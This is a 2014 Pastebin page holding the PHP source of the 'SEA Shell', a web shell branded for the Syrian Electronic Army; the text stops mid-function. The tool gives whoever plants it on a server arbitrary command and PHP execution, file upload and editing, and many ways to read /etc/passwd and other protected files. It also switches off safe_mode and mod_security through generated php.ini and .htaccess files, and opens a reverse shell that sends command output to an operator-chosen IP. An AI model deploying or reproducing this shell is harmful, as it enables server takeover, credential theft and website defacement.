API tools faq
paste
Advertisement
Dr_FarFar

[+] SyRiAn Electronic Army Shell :: SEA Shell

Dr_FarFar
Jul 6th, 2014
426
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 47.23 KB | None | 0 0
raw download clone embed print report
  1. /***
  2.      ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄     ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄
  3.     ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  4.     ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌   ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌
  5.     ▐░▌       ▐░▌▐░▌       ▐░▌   ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
  6.     ▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌   ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌
  7.     ▐░▌       ▐░▌▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  8.     ▐░▌       ▐░▌▐░█▀▀▀▀█░█▀▀    ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀
  9.     ▐░▌       ▐░▌▐░▌     ▐░▌     ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌  ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌  
  10.     ▐░█▄▄▄▄▄▄▄█░▌▐░▌      ▐░▌  ▄ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌
  11.     ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
  12.      ▀▀▀▀▀▀▀▀▀▀   ▀         ▀  ▀  ▀            ▀         ▀  ▀         ▀  ▀            ▀         ▀  ▀         ▀
  13.  
  14.                          
  15.                                              
  16. ~~~ :xD: Have Fun. Don't Forget To Bookmark This Website :xD:
  17. ~~~ https://www.FaceBook.com/Dr.FarFar
  18. ~~~ http://Dr-FarFar.BlogSpot.com/
  19.  
  20. */
  21.  
  22. UserName = SEA
  23. PassWord = SEA
  24. ###################################################################################################
  25.  
  26. <?php
  27. # Bypass SuHosin
  28. # Virtual
  29. # users 6 ID /etc/passwd
  30.  
  31. $user = 'SEA';
  32. $pass = 'SEA';
  33. $uselogin = 1;
  34. $sh3llColor = "green";
  35.  
  36. # MySQL Info ---------
  37. $DBhost = "localhost";
  38. $DBuser = "root";
  39. $DBpass = "root";
  40. #---------------------
  41. session_start();
  42. error_reporting(0);
  43. set_magic_quotes_runtime(0);
  44. set_time_limit(0);
  45. ignore_user_abort(TRUE);
  46. ini_restore("safe_mode");
  47. ini_restore("open_basedir");
  48. ini_set('max_execution_time',0);
  49. ini_set('output_buffering',0);
  50. ini_set('safe_mode','Off');
  51.  
  52. // Set Current Directory
  53. if(!$_POST && !$_SESSION['curDir']) {
  54.     $dir = getcwd();
  55.     $_SESSION['curDir'] = $dir;
  56. } else if(empty($_POST['curDir'])) {
  57.     $dir = $_SESSION['curDir'];
  58. } else {
  59.     $dir = filter($_POST['curDir']);
  60.     $_SESSION['curDir'] = $dir;
  61. }
  62. // Set Dir Mode
  63. if($_GET['dir_mode']) {
  64.     $dir_mode = $_GET['dir_mode'];
  65.     $_SESSION['dir_mode'] = $dir_mode;
  66. } else {
  67.     $dir_mode = $_SESSION['dir_mode'];
  68. }
  69.  
  70. // Set Usable Command
  71. if($_POST['exe_method']) {
  72.     $exec_method = $_POST['exe_method'];
  73. } else {
  74.     $exec_method = "exec";
  75. }
  76. # Logout
  77. if($_POST['logout']) {
  78.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  79.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  80. }
  81. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  82. if($_GET['info']){phpinfo();}
  83. $safeMode = SafeMode();
  84. $server = substr($SERVER_SOFTWARE,0,120);
  85. $daemon = "";
  86. ?>
  87. <html>
  88. <head>
  89. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
  90. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
  91. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  92. <?php echo CSS($sh3llColor); ?>
  93.  
  94. </head>
  95. <body dir='ltr'>
  96. <?php
  97. # ---------------------------------------#
  98. #             Authentication             #
  99. #----------------------------------------#
  100. if ($uselogin ==1) {
  101.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  102.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  103.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  104.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  105.         } else {
  106.             if($_POST['usrname']){
  107.                 print'<script>alert("Go and play in the street man !!");</script>';
  108.             }
  109. ?>
  110. <br><br>
  111.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
  112.             <sy>SyRiAn Electronic Army</sy>
  113.             </center><br />
  114.             <div align="center">
  115.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  116.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  117.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  118.                 <input type="submit" value=" Login  " name="login" />
  119.                 </form>
  120.             </div>
  121.             <?php
  122.             footer();
  123.             exit;
  124.         }
  125.     }
  126. }
  127. ?>
  128. <table cellpadding='0' cellspacing='0' width='100%'>
  129.     <tr>
  130.         <td width='160'>
  131.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  132.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
  133.             <center>SyRiAn Electronic Army
  134.             <p></p>
  135.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  136.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  137.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  138.                 </select>
  139.             </center>
  140.       </td>
  141.       <td>
  142.       <form method="post">
  143. <table width='100%' style="border:none; padding:2px;" >
  144.     <tr>
  145.         <td width='103'>System</td>
  146.         <td width="323"><?php echo $os; ?></td>
  147.         <td width="90">Apache Modules</td>
  148.         <td width="278"><select ><?php
  149.         if(function_exists("apache_get_modules")) {
  150.             foreach (apache_get_modules() as $module) {
  151.                 echo "<option>".$module."</option>";
  152.             }
  153.         }else {
  154.             echo "<option>NONE</option>";
  155.         }
  156.         ?></select></td>
  157.     </tr>
  158.     <tr>
  159.       <td>uname </td>
  160.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  161.       <td>Curl</td>
  162.       <td><?php echo Curl(); ?></td>
  163.     </tr>
  164.     <tr>
  165.         <td>pwd</td>
  166.         <td><?php echo getcwd(); ?></td>
  167.         <td>Open Basedir</td>
  168.         <td><?php echo openBaseDir(); ?></td>
  169.     </tr>
  170.     <tr>
  171.         <td>whoami</td>
  172.         <td><?php echo get_current_user(); ?></td>
  173.         <td>Magic_Quotes</td>
  174.         <td><?php echo magicQouts(); ?></td>
  175.     </tr>
  176.         <tr>
  177.           <td>Server</td>
  178.           <td><?php echo $server; ?></td>
  179.           <td>Register Globals</td>
  180.           <td><?php echo RegisterGlobals(); ?></td>
  181.         </tr>
  182.         <tr>
  183.           <td>Server Name</td>
  184.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  185.           <td>Gzip</td>
  186.           <td><?php echo Gzip(); ?></td>
  187.         </tr>
  188.         <tr>
  189.           <td>Your IP</td>
  190.           <td><?php echo GetRealIP(); ?></td>
  191.           <td>Oracle</td>
  192.           <td><?php echo Oracle(); ?></td>
  193.         </tr>
  194.         <tr>
  195.           <td>Server IP</td>
  196.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  197.           <td>MSQL</td>
  198.           <td><?php echo MSQL(); ?></td>
  199.         </tr>
  200.         <tr>
  201.           <td>PHP Version</td>
  202.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  203.           <td>MySQL</td>
  204.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  205.         </tr>
  206.         <tr>
  207.           <td>Safe Mode</td>
  208.           <td><?php echo $safeMode; ?></td>
  209.           <td>MySQLi</td>
  210.           <td><?php echo MysqlI(); ?></td>
  211.         </tr>
  212.         <tr>
  213.         <td>disable functions</td>
  214.         <td><select name="disableFunctions"><?php
  215.         $funArray = DisableFunctions();
  216.         $funArray = explode(",",$funArray);
  217.         sort($funArray);
  218.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  219.         ?></select>
  220.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  221.           </td>
  222.         <td>MsSQL</td>
  223.         <td><?php echo MsSQL(); ?></td>
  224.         </tr>
  225. </table>
  226. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  227. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  228. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  229. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  230. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  231. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  232. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  233. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  234. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  235. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  236. <br>
  237. </form>
  238. </table>
  239.  
  240. <form method="post">
  241. <center>
  242. <textarea cols="150" rows="20" name="result" >
  243. <?php
  244. chdir($dir);
  245. if($_POST['login'] || !$_POST){echo ScanDirs();}
  246. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  247. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  248. else if($_POST['UPLOAD_Execute']) {
  249.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  250.         if($_FILES['uploadfile']['name'][$i] != '') {
  251.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  252.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  253.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  254. ";  }
  255.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
  256. ";}
  257.         }
  258.     }      
  259. }
  260. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  261. else if($_POST['SAVE_Execute']) {
  262.     $content = filter($_POST['result']);
  263.     if(empty($content)){$content = " ";}
  264.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  265. }
  266. else if($_POST['READ_Execute']) {
  267.     $path = urldecode(filter($_POST['READ_Line']));
  268.     $file = fopen($path,'r+');
  269.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
  270.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  271.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  272.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  273.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  274.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  275.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  276.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  277.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  278.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  279.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  280.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  281.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  282.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  283.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  284.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  285.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  286.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  287.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  288.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  289. }
  290. else if($_POST['STOP_Execute']) {
  291. $genTry = GenerateFile("php.ini","
  292. safe_mode = Off
  293. disable_functions = NONE
  294. safe_mode_gid = OFF
  295. open_basedir = OFF");
  296.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
  297. ";}
  298.     else {echo "[-] Failed to generate php.ini file !!
  299. ";}
  300.    
  301.     $genTry = GenerateFile(".htaccess","
  302. <IfModule mod_security.c>
  303. SecFilterEngine Off
  304. SecFilterScanPOST Off
  305. SecFilterCheckURLEncoding Off
  306. SecFilterCheckCookieFormat Off
  307. SecFilterCheckUnicodeEncoding Off
  308. SecFilterNormalizeCookies Off
  309. </IfModule>
  310. <Limit GET POST>
  311. order deny,allow
  312. deny from all
  313. allow from all
  314. </Limit>
  315. <Limit PUT DELETE>
  316. order deny,allow
  317. deny from all
  318. </Limit>
  319. SetEnv PHPRC ".getcwd()."/php.ini
  320.     ");
  321.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  322. ";}
  323.     else {echo "[-] Failed to generate .htaccess file !!
  324. ";}
  325. }
  326. else if($_POST['CON_Type'] == "socks") {
  327.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  328.     if($sock < 0){echo "[-] failed to create socket.";}
  329.     else {
  330.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  331.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  332.         else {
  333.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
  334.             socket_write($sock, $send_var, strlen($send_var));
  335.             while($input = socket_read($sock, 10000)) {
  336.                 socket_write($sock, shell_exec($input), 12000);
  337.             }
  338.         }
  339.     }
  340. } else if($_POST['CON_Type'] == "fsockopen") {
  341.     $ip = filter(trim($_POST['ip']));
  342.     $port = filter(trim($_POST['port']));
  343.     if (!empty($ip)) {
  344.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  345.         if (!$con_fsockopen){
  346.             $result = "Error: didnt connect !!!";
  347.         } else {
  348.             $newLine="\n";          
  349.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  350.             fputs($con_fsockopen , system("uname -a") .$newLine );
  351.             fputs($con_fsockopen , system("pwd") .$newLine );
  352.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
  353.             while(!feof($con_fsockopen)){  
  354.                 fputs ($con_fsockopen);
  355.                 $one="[$";
  356.                 $two="]";
  357.                 $result= fgets ($con_fsockopen, 8192);
  358.                 $message = $result;
  359.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  360.             }
  361.             fclose ($con_fsockopen);
  362.         }
  363.     }
  364. }
  365. else if($_POST['USERS_1']){echo GetUsers1();}
  366. else if($_POST['USERS_2']) {
  367.      $array = GetUsers2();
  368.      foreach($array as $line)
  369.      {echo $line."
  370. ";}
  371. }
  372. else if($_POST['USERS_3']) {
  373.      $array = GetUsers3();
  374.      foreach($array as $line)
  375.      {echo $line."
  376. ";}
  377. }
  378. else if($_POST['USERS_4']) {
  379.      $array = GetUsers4();
  380.      foreach($array as $line)
  381.      {echo $line."
  382. ";}
  383. } else if($_POST['USERS_5']){echo GetUsers5();}
  384. else if($_POST['forbidden_bypass']) {
  385.     mkdir("forbidden");
  386.     chdir("forbidden");
  387.     $forbidden_htaccess = GenerateFile(".htaccess", "
  388. DirectoryIndex sea.txt
  389. HeaderName sea.txt
  390. ReadmeName sea.txt
  391. footerName sea.txt
  392. ErrorDocument 404 /404.html
  393. 404.html = Symlinked sea.txt
  394. Options all
  395. ForceType text/plain
  396. AddType text/plain .php
  397. AddType text/plain .html
  398. AddHandler server-parsed .php
  399. AddHandler txt .php
  400.     ");
  401.     if($forbidden_htaccess) {
  402.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  403.     } else {
  404.         echo "[-] error with generating .htaccess file.";
  405.     }
  406. } else if($_POST['find_755']) {
  407.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  408. }
  409. ?></textarea>
  410. <?php
  411. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  412. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  413. ";}
  414. ?>
  415. </center></form>
  416. <table width='100%'>
  417.     <tr valign="top">
  418.         <td width='30%'>
  419.        <!-- Command Line -->
  420.        <form method='POST' enctype="multipart/form-data">
  421.             <table height='72' border='0' id='Box' width="100%">
  422.               <tr>
  423.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  424.                     <td style="background-color:#666;padding-left:10px;">Edit File
  425.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  426.               </tr>
  427.                 <tr>
  428.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  429.                 </tr>
  430.             </table>
  431.         </form>
  432.         <!-- End Of Command Line-->
  433.        
  434.         </td>
  435.         <td width='30%' height='30'>
  436.          <!-- Command Line -->
  437.          <form method='POST' enctype="multipart/form-data">
  438.               <table height='72' border='0' id='Box'>
  439.               <tr>
  440.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  441.                 <td style="background-color:#666;padding-left:10px;">Command Line
  442.                 <?php echo print_exe_method(); ?>
  443.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  444.                 </td>
  445.             </tr>
  446.                 <tr>
  447.                   <td height="45" colspan="2">
  448.                     <?php echo SelectCommand($os); ?>
  449.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  450.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  451.                 </tr>
  452.             </table>
  453.         </form>
  454.         <!-- End Of Command Line-->
  455.       </td>
  456.         <td width='30%' height='30' valign="top">
  457.         <!-- Commands Alias-->
  458.         <form method='POST' enctype="multipart/form-data">
  459.             <table width='100%' height='72' border='0' id='Box'>
  460.               <tr>
  461.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  462.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
  463.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  464.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  465.                     </span></td>
  466.               </tr>
  467.                 <tr>
  468.                   <td height="45" colspan="2">
  469.                   <input type='file' name='uploadfile[]'>
  470.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  471.                 </tr>
  472.             </table>
  473.         </form>
  474.         <!-- End Of Commands Alias-->
  475.         </td>
  476.     </tr>
  477. <tr valign="top">
  478.         <td width='30%'>
  479.        <!-- Commands Alias-->
  480.        <form method='POST' enctype="multipart/form-data">
  481.             <table width='100%' height='72' border='0' id='Box'>
  482.               <tr>
  483.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  484.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
  485.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  486.               </tr>
  487.                 <tr>
  488.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
  489.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  490.     fwrite($file,"Hacked");
  491.     fclose($file);';}
  492.                 ?>
  493.                   </textarea>
  494.                   <br></td>
  495.               </tr>
  496.             </table>
  497.         </form>
  498.         <!-- End Of Commands Alias-->
  499.         </td>
  500.         <td width='30%' height='30'>
  501.         <!-- Commands Alias-->
  502.         <form method='POST' enctype="multipart/form-data">
  503.         <table width='100%' height='72' border='0' id='Box'>
  504.           <tr>
  505.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  506.                 <td style="background-color:#666;padding-left:10px;">Read Files
  507.                  
  508.                   <select name="READ_Type" >
  509.                     <option value="file" >file</option>
  510.                     <option value="fgets" >fgets</option>
  511.                     <option value="fgetss" >fgetss</option>
  512.                     <option value="readfile" >readfile</option>
  513.                     <option value="fread" >fread</option>
  514.                     <option value="show_source" >show_source</option>
  515.                     <option value="file_get_contents" >file_get_contents</option>
  516.                     <option value="tempnam" >tempnam</option>
  517.                     <option value="copy" >copy</option>
  518.                     <option value="symlink" >Symlink</option>
  519.                     <option value="mb_send_mail" >mb_send_mail</option>
  520.                     <option value="highlight_file" >highlight_file</option>
  521.                     <option value="curl" >Curl</option>
  522.                     <option value="imap" >Imap</option>
  523.                     <option value="mysql" >MySQL</option>
  524.                     <option value="mysqli" >MySQLI</option>
  525.                     <option value="ioncube">Ion Cube</option>
  526.                     <option value="error_log">Error_Log</option>
  527.                     <option value="include">Include</option>
  528.                     <option value="id" >ID /etc/passwd</option>
  529.                   </select>
  530.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  531.           </tr>
  532.             <tr>
  533.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  534.           </tr>
  535.         </table>
  536.         </form>
  537.         <!-- End Of Commands Alias-->
  538.   </td>
  539.         <td width='30%' height='30' valign="top">
  540.         <!-- Commands Alias-->
  541.         <form method='POST' enctype="multipart/form-data">
  542.         <table width='100%' height='72' border='0' id='Box'>
  543.           <tr>
  544.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  545.                 <td style="background-color:#666;padding-left:10px;">Back Connection
  546.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  547.           </tr>
  548.             <tr>
  549.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  550.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  551.               <select name="CON_Type" >
  552.                 <option value="socks">SOCKS</option>
  553.                 <option value="fsockopen">FSOCKOPEN</option>
  554.               </select>
  555.               </td>
  556.             </tr>
  557.         </table>
  558.         </form>
  559.         <!-- End Of Commands Alias-->
  560.         </td>
  561.     </tr>
  562. </table>
  563. <?php
  564. function IncludeReader($path) {
  565.     global $os;
  566.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  567.     $fileName = substr(strrchr($path,$slash),1);
  568.     $includePath = substr($path,0,strpos($path,$fileName,0));
  569.     ini_set("include_path",$includePath);
  570.     include($fileName);
  571. }
  572. function GetUsers1() {
  573.     return Exe('ls /var/mail');
  574. }
  575. function GetUsers2() {
  576.     $array = array();
  577.     $lines = file("/etc/passwd");
  578.     foreach($lines as $nr=>$val) {
  579.         $str = explode(":",$val);
  580.         array_push($array,$str[0]);
  581.     }
  582.     return $array;
  583. }
  584. function GetUsers3() {
  585.     $array = array();
  586.     if ($dh = opendir("/home/"))  {
  587.         while (($file = readdir($dh)) !== false)  {
  588.             array_push($array,$file);
  589.         }
  590.         closedir($dh);
  591.         return $array;
  592.     }
  593. }
  594. function GetUsers4() {
  595.     $dir = "/home/";
  596.     $array = array();
  597.      if ($dh = opendir($dir)) {
  598.         $f = readdir($dh);
  599.         while (($f = readdir($dh)) !== false) {
  600.             $dh2=opendir($dir."/");
  601.             $f2 = readdir($dh2);
  602.             while (($f2 = readdir($dh2)) !== false) {
  603.                 $f2.="/";
  604.                 $dh3=opendir($dir.$f.$f2);
  605.                 $f3 = readdir($dh3);
  606.                 while (($f3 = readdir($dh3)) !== false) {
  607.                     array_push($array,$f3);
  608.                 }
  609.             }
  610.         }
  611.         closedir($dh);
  612.         return $array;
  613.      } 
  614. }
  615. function GetUsers5(){
  616.     return realpath('/etc/passwd');
  617. }
  618. function ErrorLog($path){
  619.     $tempFile = uniqid();
  620.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  621.     error_log(file_get_contents($path), 3, $tempFile);
  622.     $content = file_get_contents($tempFile);
  623.     unlink($tempFile);
  624.     return $content;   
  625. }
  626. function SymlinkF($path) {
  627.     $tempFile = uniqid();
  628.     if(function_exists('symlink')) {
  629.         symlink($path,$tempFile);
  630.         $content = file_get_contents($tempFile);
  631.         unlink($tempFile);
  632.         return $content;
  633.     }
  634. }
  635. function MySQLReader($path) {
  636.     global $DBhost,$DBuser,$DBpass;
  637.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  638.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  639.     mysql_query("CREATE DATABASE a");
  640.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  641.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  642.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  643.     $result = mysql_query("SELECT a FROM a.a");
  644.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  645.     mysql_query("DROP DATABASE a");
  646. }
  647. function MySQLIReader($path) {
  648.     global $DBhost,$DBuser,$DBpass;
  649.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  650.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  651.     mysql_query("CREATE DATABASE a");
  652.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  653.    
  654.     function r($fp, &$buf, $len, &$err) {
  655.       print fread($fp, $len);
  656.     }
  657.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  658.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  659.     $m->set_local_infile_handler("r");
